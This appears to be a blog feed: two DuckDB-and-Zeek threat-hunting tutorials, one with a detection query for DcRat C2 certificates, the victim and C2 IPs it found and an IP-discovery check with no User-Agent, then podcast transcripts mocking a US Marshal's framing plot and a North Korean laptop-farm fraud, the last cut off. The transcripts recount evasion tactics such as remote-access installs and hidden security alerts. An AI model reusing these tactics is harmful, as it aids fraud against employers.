Traditionally, hunting for these specific certificate strings across disparate log files requires clunky pipelines or heavy SIEM queries. But if you have Zeek logs and a terminal, DuckDB makes this process incredibly fast and elegant.

Here is how I recently used DuckDB’s Zeek extension to hunt for this exact indicator in a PCAP containing AsyncRAT traffic.

The Hunt: Joining the Logs

To find the malicious traffic, we need to map the base TCP connections directly to their negotiated certificate strings. This means we have to join three separate Zeek logs:

• conn.log (for the IPs and ports)
• ssl.log (for the SSL/TLS session data)
• x509.log (for the actual certificate details)

Using DuckDB’s read_zeek() function, we can query these raw log files directly as if they were SQL tables. Here is the query to connect the dots:

SELECT 
    c.ts,
    c.uid,
    c.id_orig_h AS src_ip,
    c.id_resp_h AS dst_ip,
    c.id_resp_p AS dst_port,
    s.server_name,
    x.certificate_subject AS cert_subject,
    x.certificate_issuer AS cert_issuer
FROM read_zeek('conn.log') AS c
JOIN read_zeek('ssl.log') AS s USING (uid)
JOIN read_zeek('x509.log') AS x 
    ON list_contains(s.cert_chain_fps, x.fingerprint)
WHERE x.certificate_subject ILIKE '%dcrat%' 
   OR x.certificate_issuer ILIKE '%dcrat%';

Pro-Tip: Notice the list_contains() function. Zeek’s cert_chain_fps is a vector type (a list of strings). DuckDB parses this natively, allowing us to easily check if the fingerprint from x509.log exists anywhere in that SSL certificate chain.

The Execution & Results

Dropping into the DuckDB CLI, the query executes in milliseconds. No data ingestion, no indexing delays—just straight SQL on raw files.

% ls
a72d5f1a-1703-4f86-af3a-6896282f5277.pcap   ocsp.log
conn.log                    packet_filter.log
dns.log                     ssl.log
files.log                   weird.log
http.log                    x509.log

% duckdb
DuckDB v1.5.2 (Variegata)
Enter ".help" for usage hints.

memory D load zeek;

memory D SELECT
             c.ts,
             c.uid,
             c.id_orig_h AS src_ip,
             c.id_resp_h AS dst_ip,
             c.id_resp_p AS dst_port,
             s.server_name,
             x.certificate_subject AS cert_subject,
             x.certificate_issuer AS cert_issuer
         FROM read_zeek('conn.log') AS c
         JOIN read_zeek('ssl.log') AS s USING (uid)
         JOIN read_zeek('x509.log') AS x
             ON list_contains(s.cert_chain_fps, x.fingerprint)
         WHERE x.certificate_subject ILIKE '%dcrat%'
            OR x.certificate_issuer ILIKE '%dcrat%';

┌───────────────────────┬────────────────────┬────────────────┬───────────────┬──────────┬─────────────┬──────────────┬───────────────────────┐
│          ts           │        uid         │     src_ip     │    dst_ip     │ dst_port │ server_name │ cert_subject │      cert_issuer      │
│ timestamp with time z │      varchar       │      inet      │     inet      │  uint16  │   varchar   │   varchar    │        varchar        │
│          one          │                    │                │               │          │             │              │                       │
├───────────────────────┼────────────────────┼────────────────┼───────────────┼──────────┼─────────────┼──────────────┼───────────────────────┤
│ 2026-04-22 10:45:04.0 │ CwW7GO2oFwvT98QrXf │ 192.168.100.17 │ 178.16.52.105 │      207 │ NULL        │ CN=DcRat     │ C=CN,L=SH,O=DcRat By  │
│ 28574-04              │                    │                │               │          │             │              │ qwqdanchun,OU=qwqdanc │
│                       │                    │                │               │          │             │              │ hun,CN=DcRat Server   │
└───────────────────────┴────────────────────┴────────────────┴───────────────┴──────────┴─────────────┴──────────────┴───────────────────────┘

The Breakdown

Boom. The output immediately surfaces our malicious connection:

• Victim IP: 192.168.100.17
• C2 Destination: 178.16.52.105
• Anomalous Port: 207 (A quick secondary indicator that this isn’t standard web traffic).
• The Smoking Gun: A certificate explicitly issued by C=CN,L=SH,O=DcRat By qwqdanchun,OU=qwqdanchun,CN=DcRat Server.

Conclusion

When performing incident response or threat hunting, speed and agility are everything. DuckDB’s ability to cleanly parse Zeek’s complex list and vector types makes navigating complex log relationships incredibly clean. Next time you have a directory full of Zeek logs, skip the heavy ingestion pipelines and try querying them directly.

How is everyone else analyzing their Zeek logs these days? Let me know!

The post Hunting Lazy OPSEC: Spotting Default C2 Certificates with DuckDB and Zeek first appeared on DrKeithJones.com.

If you’ve spent years in the SOC, you’ve likely built up a library of complex awk chains and grep commands to parse Zeek data. It works, but it’s brittle and hard to read. I recently used DuckDB and the zeek-duckdb extension to analyze a malware sample, and the difference is night and day. Instead of wrestling with syntax, I was able to run blazing-fast SQL queries against raw logs directly in my terminal.

The Power of the Join

The real magic happens when you treat your logs like relational data. By joining conn.log and http.log on the shared connection uid, you instantly combine application-layer context with network-layer ground truth.

In this hunt, I was looking for data exfiltration patterns. While a standard web log might show you a successful GET request, joining it with the connection log allows you to see exactly how many bytes left the network during that specific session.

The “Aha!” Moment

I wrote a query to sort by orig_bytes DESC to surface the largest data transfers. While this specific sample didn’t show massive exfiltration, stacking the data this way made an anomaly glaringly obvious: a request to icanhazip.com with a NULL User-Agent.

Legitimate services usually send User-Agents. Seeing a missing one hitting an external IP discovery site is textbook automated malware. The script is mapping its new victim network before beaconing out to C2. I found this in seconds with zero infrastructure setup.

keith.jones@Keiths-MacBook-Pro duckdb % duckdb
DuckDB v1.5.1 (Variegata)
Enter ".help" for usage hints.
memory D load zeek;
memory D SELECT
          c.ts,
          c.uid,
          c.id_orig_h AS source_ip,
          c.id_resp_h AS dest_ip,
          h.method,
          h."host", -- Using quotes because LinkedIn will auto hyperlink this
          h.uri,
          h.user_agent,   -- Context: What tool is making the request?
          c.orig_bytes,   -- Network: How much data did the client send? (Hunting Exfil)
          c.resp_bytes,   -- Network: How much data did the server return?
          h.status_code,
          c.conn_state   -- Network: Did the connection finish normally or get abruptly reset?
          FROM read_zeek('conn.log') AS c
          JOIN read_zeek('http.log') AS h USING (uid)
          ORDER BY c.orig_bytes DESC; -- Sorting by data sent out to look for exfil
┌───────────────────────────────┬────────────────────┬────────────────┬────────────────┬─────────┬───────────────────────┬───────────────────────────────────┬──────────────────────────┬────────────┬────────────┬─────────────┬────────────┐
│              ts               │        uid         │   source_ip    │    dest_ip     │ method  │         host          │                uri                │        user_agent        │ orig_bytes │ resp_bytes │ status_code │ conn_state │
│   timestamp with time zone    │      varchar       │      inet      │      inet      │ varchar │        varchar        │              varchar              │         varchar          │   uint64   │   uint64   │   uint64    │  varchar   │
├───────────────────────────────┼────────────────────┼────────────────┼────────────────┼─────────┼───────────────────────┼───────────────────────────────────┼──────────────────────────┼────────────┼────────────┼─────────────┼────────────┤
│ 2026-04-14 09:23:46.86766-04  │ C9I1o32GZkDMCaqjU1 │ 192.168.100.15 │ 88.221.169.152 │ GET     │ www.microsoft.com     │ /pkiops/crl/Microsoft ECC Product │ Microsoft-CryptoAPI/10.0 │        484 │       1917 │         200 │ RSTO       │
│                               │                    │                │                │         │                       │  Root Certificate Authority 2018. │                          │            │            │             │            │
│                               │                    │                │                │         │                       │ crl                               │                          │            │            │             │            │
├───────────────────────────────┼────────────────────┼────────────────┼────────────────┼─────────┼───────────────────────┼───────────────────────────────────┼──────────────────────────┼────────────┼────────────┼─────────────┼────────────┤
│ 2026-04-14 09:23:46.86766-04  │ C9I1o32GZkDMCaqjU1 │ 192.168.100.15 │ 88.221.169.152 │ GET     │ www.microsoft.com     │ /pkiops/crl/Microsoft ECC Update  │ Microsoft-CryptoAPI/10.0 │        484 │       1917 │         200 │ RSTO       │
│                               │                    │                │                │         │                       │ Secure Server CA 2.1.crl          │                          │            │            │             │            │
├───────────────────────────────┼────────────────────┼────────────────┼────────────────┼─────────┼───────────────────────┼───────────────────────────────────┼──────────────────────────┼────────────┼────────────┼─────────────┼────────────┤
│ 2026-04-14 09:23:17.160462-04 │ CERXXs2SXczhdsjGd2 │ 192.168.100.15 │ 204.79.197.203 │ GET     │ oneocsp.microsoft.com │ /ocsp/MFQwUjBQME4wTDAJBgUrDgMCGgU │ Microsoft-CryptoAPI/10.0 │        253 │       1444 │         200 │ S1         │
│                               │                    │                │                │         │                       │ ABBQ3L3//a6ADK8NraY2GXzVaYrHG4AQU │                          │            │            │             │            │
│                               │                    │                │                │         │                       │ b6t+2v+XQ3LsO2d33oJhNYhHQoUCEzMAA │                          │            │            │             │            │
│                               │                    │                │                │         │                       │ AAGb6JMMcOVb6sAAAAAAAY=           │                          │            │            │             │            │
├───────────────────────────────┼────────────────────┼────────────────┼────────────────┼─────────┼───────────────────────┼───────────────────────────────────┼──────────────────────────┼────────────┼────────────┼─────────────┼────────────┤
│ 2026-04-14 09:23:38.089325-04 │ Cgbswa2jFzUocQtifg │ 192.168.100.15 │ 23.11.41.157   │ GET     │ ocsp.digicert.com     │ /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ5 │ Microsoft-CryptoAPI/10.0 │        240 │        641 │         200 │ S1         │
│                               │                    │                │                │         │                       │ 0otx/h0Ztl+z8SiPI7wEWVxDlQQUTiJUI │                          │            │            │             │            │
│                               │                    │                │                │         │                       │ BiV5uNu5g/6+rkS7QYXjzkCEAz1vQYrVg │                          │            │            │             │            │
│                               │                    │                │                │         │                       │ L0erhQLCPM8GY=                    │                          │            │            │             │            │
├───────────────────────────────┼────────────────────┼────────────────┼────────────────┼─────────┼───────────────────────┼───────────────────────────────────┼──────────────────────────┼────────────┼────────────┼─────────────┼────────────┤
│ 2026-04-14 09:23:17.095191-04 │ CqWV6W1GPWojiojYde │ 192.168.100.15 │ 23.11.41.157   │ GET     │ ocsp.digicert.com     │ /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTr │ Microsoft-CryptoAPI/10.0 │        236 │        485 │         200 │ S1         │
│                               │                    │                │                │         │                       │ jrydRyt+ApF3GSPypfHBxR5XtQQUs9tIp │                          │            │            │             │            │
│                               │                    │                │                │         │                       │ PmhxdiuNkHMEWNpYim8S8YCEAjTxtAB8m │                          │            │            │             │            │
│                               │                    │                │                │         │                       │ y1oj8MfWpz/7Y=                    │                          │            │            │             │            │
├───────────────────────────────┼────────────────────┼────────────────┼────────────────┼─────────┼───────────────────────┼───────────────────────────────────┼──────────────────────────┼────────────┼────────────┼─────────────┼────────────┤
│ 2026-04-14 09:23:26.479552-04 │ CwBv002K9i2nSr9PW1 │ 192.168.100.15 │ 23.216.77.30   │ GET     │ crl.microsoft.com     │ /pki/crl/products/MicRooCerAut201 │ Microsoft-CryptoAPI/10.0 │        216 │       1267 │         200 │ S1         │
│                               │                    │                │                │         │                       │ 1_2011_03_22.crl                  │                          │            │            │             │            │
├───────────────────────────────┼────────────────────┼────────────────┼────────────────┼─────────┼───────────────────────┼───────────────────────────────────┼──────────────────────────┼────────────┼────────────┼─────────────┼────────────┤
│ 2026-04-14 09:23:26.599969-04 │ CJNCiO1k6X4OK5cB6g │ 192.168.100.15 │ 23.59.18.102   │ GET     │ www.microsoft.com     │ /pkiops/crl/MicSecSerCA2011_2011- │ Microsoft-CryptoAPI/10.0 │        209 │       1359 │         200 │ S1         │
│                               │                    │                │                │         │                       │ 10-18.crl                         │                          │            │            │             │            │
├───────────────────────────────┼────────────────────┼────────────────┼────────────────┼─────────┼───────────────────────┼───────────────────────────────────┼──────────────────────────┼────────────┼────────────┼─────────────┼────────────┤
│ 2026-04-14 09:24:04.219286-04 │ CeRSW815NsWYrVvGod │ 192.168.100.15 │ 104.16.184.241 │ GET     │ icanhazip.com         │ /                                 │ NULL                     │         63 │        584 │         200 │ S1         │
└───────────────────────────────┴────────────────────┴────────────────┴────────────────┴─────────┴───────────────────────┴───────────────────────────────────┴──────────────────────────┴────────────┴────────────┴─────────────┴────────────┘
memory D

Conclusion

By moving from text-parsing to SQL-querying, we stop fighting the logs and start asking better questions. Whether you are doing local IR or proactive threat hunting, the combination of Zeek’s visibility and DuckDB’s speed is a formidable addition to any toolkit.

Resources

• Malware Sample: ANY.RUN Task
• The Extension: zeek-duckdb on GitHub

The post Beyond the Grep: Hunting Malware with Zeek and DuckDB SQL first appeared on DrKeithJones.com.

Sources:

• https://www.courtlistener.com/docket/59911729/united-states-v-diaz/
• https://www.courtlistener.com/docket/14547216/michelle-suzanne-hadley-v-city-of-anaheim/
• https://nypost.com/2023/03/27/deputy-us-marshal-convicted-in-fake-rape-fantasy-plot/
• https://www.dailystar.co.uk/news/world-news/cop-lures-men-internet-rape-29548746
• https://lawandcrime.com/crime/us-marshal-convicted-for-luring-men-from-craigslist-to-rape-his-wife-in-plot-to-blame-his-ex-girlfriend/

Transcript:

00:00:10:02 – 00:00:41:52
Dr. Keith Jones
What’s up, you crazy bastards? Welcome to another episode of eCrimeBytes. This is where I research the court documentation and roast the criminals so you don’t have to. Today we’re talking about an active duty deputy U.S. Marshal, a guy whose day job is investigating cyber threats. A federal jury found that he decided to frame his innocent ex-fiancée by setting up a fake Craigslist rape fantasy sting at his own condo.

00:00:41:57 – 00:01:02:38
Dr. Keith Jones
His OpSec was so incredibly bad that an innocent person spent 88 days in jail, while trial evidence proved his new wife faked a pregnancy with a sonogram that she bought from Etsy. Grab a drink. You’re going to need it.

00:01:02:43 – 00:01:06:16
Dr. Keith Jones
Let’s set the stage. Meet Ian Diaz.

00:01:06:16 – 00:01:12:54
Dr. Keith Jones
In 2015. Ian is a US Marshal in Los Angeles. He and his fiancee, Michelle Hadley

00:01:12:54 – 00:01:15:32
Dr. Keith Jones
decided to buy a place together in Anaheim.

00:01:15:32 – 00:01:24:05
Dr. Keith Jones
Look at this swanky high end $470,000 luxury pad. Michelle actually drops the 14k

00:01:24:10 – 00:01:25:50
Dr. Keith Jones
down payment for it.

00:01:25:56 – 00:01:42:44
Dr. Keith Jones
But according to prosecutors, Ian’s a controlling monster. They break up. Michelle moves out, and she demands he take over the mortgage or sell the place so she can get her money back. Ian wants to keep the condo, but he can’t afford it.

00:01:42:48 – 00:02:01:01
Dr. Keith Jones
So what’s a sworn federal law enforcement officer to do? He immediately marries a new woman named Angela, moves her into the condo and, according to court documents, hatches a master plan to frame his ex-girlfriend for federal cyber crimes so he doesn’t have to pay her

00:02:01:01 – 00:02:04:39
Dr. Keith Jones
out.

00:02:04:44 – 00:02:15:05
Dr. Keith Jones
In 2016, the DOJ proved that a US Marshal named Ian Diaz and his new wife, Angela hatched a plan to frame his ex-girlfriend for cyberstalking.

00:02:15:10 – 00:02:42:04
Dr. Keith Jones
Trial evidence showed that they created fake email accounts and started sending themselves the most unhinged, violent threats imaginable. I’m talking threats of murder, rape, and they also attach photos of dead fetuses. But here is where the genius OpSec begins. To make sure the police know it’s his ex, Michelle, they sign almost every single email with her full

00:02:42:12 – 00:02:45:31
Dr. Keith Jones
name, Michelle S Hadley.

00:02:45:36 – 00:03:19:39
Dr. Keith Jones
So who frames someone for violent felonies and signs it like a corporate memo? “I’m going to destroy your life. Best regards, Michelle S Hadley sent from my iPhone”. But Ian doesn’t stop there. Prosecutors established that he goes on Craigslist to the casual encounter section. Posing as Michelle, he replies to rape fantasy ads, gives random men his own address, and tells them to come over and attack his new wife.

00:03:19:44 – 00:03:47:41
Dr. Keith Jones
On June 13th, 2016, trial records show that US Martial Ian Diaz uses Craigslist to lure a stranger to his own condo for the fake rape fantasy. According to body cam footage and police reports presented at trial, Ian waits outside with his badge around his neck and his gun drawn. The local cops show up and Ian leans into his day job hard.

00:03:47:46 – 00:03:48:30
Dr. Keith Jones
He looks at

00:03:48:30 – 00:03:58:20
Dr. Keith Jones
the cops and he plays victim perfectly, asking, “At what point does this go get arrested for sending this shit and hiring guys off a Craigslist to rape Angela? I’m just curious”.

00:03:58:20 – 00:04:01:27
Dr. Keith Jones
The trial’s transcripts also show he brags to the

00:04:01:32 – 00:04:07:25
Dr. Keith Jones
officers. “I work on judicial threats, and we have seen some really sick shit. Nothing like this.”

00:04:07:26 – 00:04:32:08
Dr. Keith Jones
And then he pushes them to arrest his ex. When the officer confirms that they’re going to charge her with a felony, the footage captures Ian pumping his fist in the air and yelling, “Fuck yeah! That’s all I give a shit about.” The local cops actually arrest his innocent ex, and she spends 88 days in a high security jail.

00:04:32:13 – 00:04:48:41
Dr. Keith Jones
Let’s get to the roast. Because US Marshal Ian Diaz’s OpSec is about to spectacularly implode. The jury determined that he had just framed his ex-girlfriend for sending death threats and posting Craigslist rape fantasies.

00:04:48:46 – 00:04:49:30
Dr. Keith Jones
Fail number

00:04:49:33 – 00:05:15:21
Dr. Keith Jones
one, the IP address. Ian thought he was a ghost because he used a VPN, but he got lazy. The DOJ’s Microsoft warrant returns showed that 21 of those violent emails came from a static IP address. Where do you think that static IP address resolved to? his ex? No. It resolved Ian’s own living room Wi-Fi.

00:05:15:21 – 00:05:24:33
Dr. Keith Jones
Fail number two, the Craigslist subpoena. The detective finally decides to send a warrant to Craigslist. The recovery email address on the account

00:05:24:37 – 00:05:44:56
Dr. Keith Jones
that posted the rape ads is northoflightsend@gmail.com. This is Ian’s personal Gmail account. And then later, when confronted by federal investigators, Ian said he was just doing his own independent research by messaging the hacker.

00:05:45:10 – 00:05:55:09
Dr. Keith Jones
Sure. And then why does your email address show up as the person who posted the ad?

00:05:55:14 – 00:06:15:06
Dr. Keith Jones
As the jury found, Angela Diaz and her US Marshall husband just framed this innocent ex-girlfriend, throwing her in a maximum security jail for 88 days. To make sure the judge through the book at her, Angela told police that the stress of cyberstalking caused her to miscarry twins.

00:06:15:11 – 00:06:23:08
Dr. Keith Jones
To prove it, she showed them a sonogram. But investigators discovered she wasn’t pregnant.

00:06:23:11 – 00:06:55:46
Dr. Keith Jones
Court records show she went on Etsy.com and bought a fake ultrasound. I didn’t even know that was possible. What did she type into the search bar? “Artisanal Handcrafted Perjury” or “Rustic Obstruction of Justice”? So they just took these fake Etsy medical records, and they submitted it into a criminal investigation to get an innocent woman locked up.

00:06:55:51 – 00:07:14:20
Dr. Keith Jones
The scheme completely unravels. The US Marshall and his wife, they’re caught framing his ex-girlfriend for cyberstalking. The district attorney realizes the local PD completely botched the investigation. The innocent girlfriend is exonerated and released after 88 days of absolute hell in jail.

00:07:14:20 – 00:07:20:01
Dr. Keith Jones
During a later civil deposition, a lawyer asks the Marshal, Ian Diaz,

00:07:20:13 – 00:07:38:32
Dr. Keith Jones
under oath “Did you ever forward any emails to the police department from Angela’s account”? And Ian’s response was “No. Correction. I would forward emails that she had already forwarded to me”. And spoiler alert, the federal investigators discovered that Ian sent them himself.

00:07:38:46 – 00:07:41:23
Dr. Keith Jones
That’s a perjury charge, folks.

00:07:41:23 – 00:07:42:08
Dr. Keith Jones
Let’s check

00:07:42:08 – 00:08:07:06
Dr. Keith Jones
the final scoreboard. Angela Diaz takes a plea deal. She gets five years in state prison. Ian Diaz, the US Marshal, who thought he was smarter than everybody else, goes to trial. He is convicted of conspiracy, cyberstalking, perjury and obstruction of justice. And he got 121 months in federal prison. So ten years and one month.

00:08:07:06 – 00:08:33:37
Dr. Keith Jones
Well, listeners, the case of Ian Diaz proves one thing. Just because you have a federal badge and a computer crimes training manual doesn’t mean you know how an IP address works. He tried to play 4D chess, but ended up checkmating himself with his own router over a condo. If you want more deep dives into terrible OpSec and digital stupidity, make sure you hit subscribe.

00:08:33:49 – 00:08:38:23
Dr. Keith Jones
All right, you crazy bastards. Thanks for tuning in. I’ll see you in the next episode.

The post Ian Diaz – The U.S. Marshal, the Etsy Sonogram, and the Condo Plot first appeared on DrKeithJones.com.

Sources:

• https://www.justice.gov/usao-dc/pr/arizona-woman-sentenced-17m-it-worker-fraud-scheme-illegally-generated-revenue-north
• https://www.justice.gov/opa/pr/arizona-woman-sentenced-17m-information-technology-worker-fraud-scheme-generated-revenue
• https://www.courtlistener.com/docket/68534209/united-states-v-chapman/
• https://www.courtlistener.com/docket/68534169/united-states-v-chapman/ 
• https://www.justice.gov/opa/pr/justice-department-announces-coordinated-nationwide-actions-combat-north-korean-remote
• https://sherwood.news/business/north-korea-freelance-it-scheme-raising-cash/
• https://nypost.com/2025/07/25/us-news/arizona-woman-christina-marie-chapman-sentenced-to-jail-for-helping-north-korea-tech-workers-infiltrate-us-jobs/

Transcript:

00:00:10:02 – 00:00:24:56
Dr. Keith Jones
What’s up, you crazy bastards? Welcome to another episode of eCrimeBytes. This is where I research the court documentation and roast the criminals so you don’t have to. And trust me, today’s roast is well seasoned.

00:00:25:01 – 00:00:37:12
Dr. Keith Jones
Okay, so today we have an absolute gem. We’re talking about a woman named Christina Chapman who ran what the feds called a “laptop farm” from her house in Arizona.

00:00:37:17 – 00:00:47:57
Dr. Keith Jones
Yeah, while other people were out there growing tomatoes, she was cultivating fully operational North Korean remote workers, like some kind of geopolitical Farmville.

00:00:48:02 – 00:01:06:01
Dr. Keith Jones
And this wasn’t just any farm. This was a high tech fraud farm helping what the court docs strongly suggest are North Korean IT workers steal identities, get high paying US tech jobs, and funnel millions of dollars back to the regime.

00:01:06:05 – 00:01:23:02
Dr. Keith Jones
She was basically the most important person in Kim Jong Un’s budget planning. An absolutely wild career pivot for someone in Arizona. One minute your grocery shopping at Safeway, the next you’re underwriting a rogue state’s payroll like it’s your side hustle.

00:01:23:07 – 00:01:57:01
Dr. Keith Jones
It was a huge, sophisticated operation that defrauded over 300 U.S. companies, which is more clients the most real IT consultants ever land. And we’re not talking about small time shops, either. The feds described these as blue chip companies, including get this, a top five national television network, a premier Silicon Valley technology company, an iconic American car manufacturer, a high end retail chain, and one of the most recognizable media and entertainment companies in the world.

00:01:57:06 – 00:02:22:35
Dr. Keith Jones
But this isn’t a story of criminal mastermind. Holy hell. This is a story of someone who created a perfect evidence locker for the FBI. In her own chat logs. She practically messaged her way to federal prison. At this point, the FBI didn’t need a warrant. They just needed her notification history. If crimes were solved by screen time reports, she’d be doing life. And the documents? The court documents?

00:02:22:40 – 00:02:26:03
Dr. Keith Jones
Oh, boy. They tell a whole story. Let me walk you through them.

00:02:26:08 – 00:02:53:14
Dr. Keith Jones
So what was Christina Chapman actually doing? I mean, besides turning her suburban home into the Dollar Tree version of the CIA? Well, we know exactly what she did. Because the feds made her sign a 17 page confession as part of her plea deal. It’s called the statement of offense, and it lays out everything. So here’s the setup. You’ve got these highly skilled overseas IT workers backed by North Korea.

00:02:53:18 – 00:03:14:20
Dr. Keith Jones
They want to earn some hard currency for the regime, but they’re blocked by international sanctions. You know, little things like global laws and every major country saying absolutely not. They can’t get hired by a U.S. company. They need to look, sound and appear to be working in America if they want to try.

00:03:14:25 – 00:03:25:48
Dr. Keith Jones
So how does a woman in Arizona become the US hub for an international fraud ring? Well, the court file says that in March 2020, she was approached on LinkedIn.

00:03:25:53 – 00:03:58:28
Dr. Keith Jones
That pause was for effect. Let me just repeat that. This is not some encrypted, anonymous dark web forum. Not Signal. Not Telegram. Not WhatsApp. Not even a burner phone taped to a stray raccoon. LinkedIn, LinkedIn. So this is the website designed to tie everything to your real world professional identity. An unknown coconspirator messaged her and asked her to, quote unquote, be the US face of their company.

00:03:58:33 – 00:04:11:36
Dr. Keith Jones
And she was like, sure sounds legit. She created a digital paper trail connecting her real identity to the conspiracy from this very first message. You have to respect the commitment to transparency, right?

00:04:11:41 – 00:04:31:28
Dr. Keith Jones
So now she’s quote unquote, the face of this company. The first step for the overseas crew is getting hired. And the court documents say that they either stole identities outright or get this convinced, U.S. persons to loan their identities for money.

00:04:31:33 – 00:04:38:07
Dr. Keith Jones
Wow. I wonder how much they paid them for that. I couldn’t imagine loaning somebody my identity. That is just absolutely crazy.

00:04:38:12 – 00:04:55:30
Dr. Keith Jones
But how did Christina and her coconspirators know if these stolen or loaned identities were any good? You want a clean record? Basically, to go work at a company, right? So how do they know that a fictitious person like Danielle B didn’t have a criminal record?

00:04:55:35 – 00:05:08:12
Dr. Keith Jones
Simple. They ran background checks on these identities, and Christina Chapman paid for it. The court file says that she gave a coconspirator her personal debit card

00:05:08:17 – 00:05:12:36
Dr. Keith Jones
to pay for an account at a online background check service.

00:05:12:41 – 00:05:29:14
Dr. Keith Jones
And they use this to run this account to run criminal history and social security number traces on their stolen identities. In her message to her coconspirators about it, she said as a total charge to my invoices. Okay, we’re going to see her invoices in a bit.

00:05:29:19 – 00:05:41:21
Dr. Keith Jones
She was literally expensing her identity laundering service. If she had an accountant, that man would have jumped out of the window at this point. I guess tax write offs are important even in a federal crime, right?

00:05:41:26 – 00:05:49:46
Dr. Keith Jones
So they got their clean fake identities at this point, and they pass the interviews to get hired as Daniel B or Andy P.

00:05:49:53 – 00:05:52:35
Dr. Keith Jones
This is how the court documents referred to the identities.

00:05:52:40 – 00:06:05:04
Dr. Keith Jones
And this is where we get to the central problem of the whole case. When Daniel B got his new high paying tech job, the company had to ship him a work laptop. And where do they send it?

00:06:05:08 – 00:06:14:42
Dr. Keith Jones
Not to a random P.O. box, not to any shipping service. They sent it directly to Christina Chapman’s house in Arizona.

00:06:14:47 – 00:06:18:50
Dr. Keith Jones
So she used her own home address as the drop point.

00:06:18:55 – 00:06:25:37
Dr. Keith Jones
This, my friends, is the laptop farm, the only farm in America where nothing grows except for felonies.

00:06:25:42 – 00:06:38:20
Dr. Keith Jones
But she wasn’t just a mailbox. She was active tech support. She gets the computer connected to her internet using her home IP address as the digital cover, and install remote access software.

00:06:38:20 – 00:06:44:22
Dr. Keith Jones
So the real IT worker in North Korea could log in to these computers in her home.

00:06:44:27 – 00:06:55:38
Dr. Keith Jones
She was the ultimate IT admin, except her users were literally hostile foreign actors. Honestly, she was one password reset away from being an honorary member of the North Korean I.T. department.

00:06:55:43 – 00:07:01:26
Dr. Keith Jones
And she wasn’t just careless. She was proud of her work. A coconspirator at one point asks her.

00:07:01:31 – 00:07:12:10
Dr. Keith Jones
I want to access that remotely. Do you know how to install any desk? And her brazen reply. I do it practically every day. So she bragged about it.

00:07:12:15 – 00:07:26:38
Dr. Keith Jones
She was also the technical problem solver. And by technical, I mean she was out there providing tier one half support, the kind where the solution is mostly praying the company security team is on a lunch break.

00:07:26:43 – 00:07:52:33
Dr. Keith Jones
What that means is she didn’t want the U.S. workers or the U.S. companies IT department to catch on. So she’s hoping that they’re just not paying attention. So in one chat, her coconspirator the fake employee, the one from North Korea, had another developer. A third person. So now there’s Christina, the North Korean person, and then a third developer, all logging into the same laptop.

00:07:52:38 – 00:08:03:40
Dr. Keith Jones
This, of course, triggered a security alert on the machine that popped up on the screen because, shockingly, with three people log in to the same laptop from three different continents, Microsoft tends to notice.

00:08:03:45 – 00:08:08:15
Dr. Keith Jones
So the fake employee messages Chapman, who is physically at the laptop and asks

00:08:08:19 – 00:08:13:34
Dr. Keith Jones
any way to hide it in my way? Now you have to imagine there’s probably some translation going on.

00:08:13:36 – 00:08:30:46
Dr. Keith Jones
So when I do these readings of the other workers, you’re going to hear misspellings and all that, and I’m just keeping it as is. And he says, any way to hide it in my way? And Christina looks at that and says, oh, he must be talking about the security panel. And she goes, she goes ahead and closes it for him.

00:08:30:51 – 00:08:46:05
Dr. Keith Jones
So he’s literally asking her to help him hide his own secret developer security alert from the U.S. company’s IT department in case they’re looking at the screen, too. It’s a conspiracy within a conspiracy. And she’s just doing it.

00:08:46:10 – 00:08:54:16
Dr. Keith Jones
But my favorite tech support story. Oh, buckle up, because this one deserves its own Emmy. One of her buddies was panicking.

00:08:54:18 – 00:08:59:35
Dr. Keith Jones
He messages her, hi, please help me. It’s very urgent. I have to meet team in 30 minutes.

00:08:59:40 – 00:09:30:38
Dr. Keith Jones
So she jumps right on the Microsoft Teams call for him. She’s not just aiding a conspiracy here. She’s apparently auditioning to be the body double for the fake employees in this operation. The reason this fake employee over North Korea was joining the meeting from an unauthorized overseas device. And she was joining from the company laptop in Arizona. So the company, the U.S. companies, IT department would see two devices logged in under the same name.

00:09:30:48 – 00:09:35:09
Dr. Keith Jones
Daniel B. She messages back, who do I say I am?

00:09:35:14 – 00:09:52:38
Dr. Keith Jones
Honestly, at this point, she could have just said I’m Daniel B’s emotional support human, right? Her excuse for using multiple devices. She said I just typed in the name Daniel. If they ask why you’re using two devices, just say the microphone on your laptop doesn’t work right.

00:09:52:40 – 00:09:55:56
Dr. Keith Jones
Most people are fine with that explanation.

00:09:56:01 – 00:10:01:45
Dr. Keith Jones
Holy hell. I’m sure that was the first time a night department ever heard the excuse the mic doesn’t work.

00:10:01:49 – 00:10:26:11
Dr. Keith Jones
So her job wasn’t just tech support, she was also criminal HR. She was basically the world’s worst HR rep. Like, if the onboarding packet came with a ski mask and a burner phone, she personally forged federal documents like full blown government forms. Most people get nervous filling out a W-4, and she’s out there free handing felony signatures like it’s arts and crafts.

00:10:26:11 – 00:10:46:35
Dr. Keith Jones
Our a coconspirator messages her please ship out the hand sign I-9 form by the end of the day. And she replies, yes, I’ll get it out today. I did my best to copy your signature. And he just replies, hah hah thank you. The fraud ring had better customer service than most legitimate companies.

00:10:46:40 – 00:10:48:54
Dr. Keith Jones
But she wasn’t always the master forger.

00:10:48:59 – 00:11:10:01
Dr. Keith Jones
A coconspirator sent her an image of a fake, temporary Alabama driver’s license and asked her to do a check if it looks real. He messages: Is this the right form? Do you have any other idea? Again, that’s exactly how he typed it. Do you have any of idea? And he’s asking her for a quality control on his fake ID and her expert professional opinion.

00:11:10:06 – 00:11:34:35
Dr. Keith Jones
Yes. I guess it’s the same image I get when I Google. So she googled it. Fantastic. Nothing screams international crime syndicate like relying on the same research method teenagers used to cheat on their homework. When the most sophisticated part of your international identity fraud scheme is reverse image search. You’re probably in trouble.

00:11:34:39 – 00:11:37:20
Dr. Keith Jones
And the identities themselves were a mess.

00:11:37:24 – 00:12:04:06
Dr. Keith Jones
It wasn’t identity theft, this was this was identity thrift store shopping. One of her coconspirators needed help with a background story for an identity, Daniel B. Why? Because the real Daniel B had a criminal record. So the brilliant plan to use a stolen identity was to use a stolen identity of someone already flagged by the system.

00:12:04:11 – 00:12:10:53
Dr. Keith Jones
Chapman even had a message or coconspirator to ask for details about Daniel B, so they could build a cover story for this guy.

00:12:10:57 – 00:12:26:03
Dr. Keith Jones
Holy hell, this is a masterclass in failure. At this point, the only way it could have been worse is to accidentally use the identity of a guy currently in prison. They were recruiting identities off the Do Not Hire list.

00:12:26:07 – 00:12:39:25
Dr. Keith Jones
